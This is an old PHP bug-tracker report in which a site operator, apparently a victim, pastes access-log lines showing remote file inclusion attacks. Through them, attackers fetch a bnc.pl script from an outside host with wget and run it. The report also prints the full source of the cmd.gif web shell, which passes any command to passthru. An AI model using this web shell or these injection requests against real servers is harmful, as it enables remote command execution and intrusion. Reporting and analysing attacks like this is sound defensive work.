ID: 30236 Updated by: [EMAIL PROTECTED] Reported By: wschow at comp dot hkbu dot edu dot hk -Status: Open +Status: Feedback Bug Type: *General Issues Operating System: Solaris 2.6 PHP Version: 5.0.1 New Comment:
What is index1.php ? Previous Comments: ------------------------------------------------------------------------ [2004-09-26 02:02:36] wschow at comp dot hkbu dot edu dot hk Description: ------------ It seems that PHP 5.0.2 has file injection problem as such: 200.164.94.78 - - [25/Sep/2004:08:29:37 +0800] "GET /~ABC/test/index1.php?page =http://h4ck3rscan.port5.com/cmd.gif?&cmd=cd%20tmp/rm%20-rf%20bnc.pl;rm%20-rf%20 bnc.pid HTTP/1.1" 200 6714 200.165.82.160 - - [25/Sep/2004:23:02:24 +0800] "GET /~ABC/test/index1.php?pag e=http://h4ck3rscan.port5.com/cmd.gif?&cmd=cd%20/tmp;wget%20members.lycos.co.uk/ spakk/bnc.pl HTTP/1.1" 200 7139 200.165.82.160 - - [25/Sep/2004:23:04:35 +0800] "GET /~ABC/test/index1.php?pag e=http://h4ck3rscan.port5.com/cmd.gif?&cmd=cd%20/tmp;perl%20bnc.pl%20-p%201718%2 0-s%20cfcfclols HTTP/1.1" 200 6714 In http://h4ck3rscan.port5.com/cmd.gif, it shows the source: <? // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt ) if (isset($chdir)) @chdir($chdir); ob_start(); passthru("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp"); $output = ob_get_contents(); ob_end_clean(); if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output)); ?> Any solutions? ------------------------------------------------------------------------ -- Edit this bug report at http://bugs.php.net/?id=30236&edit=1
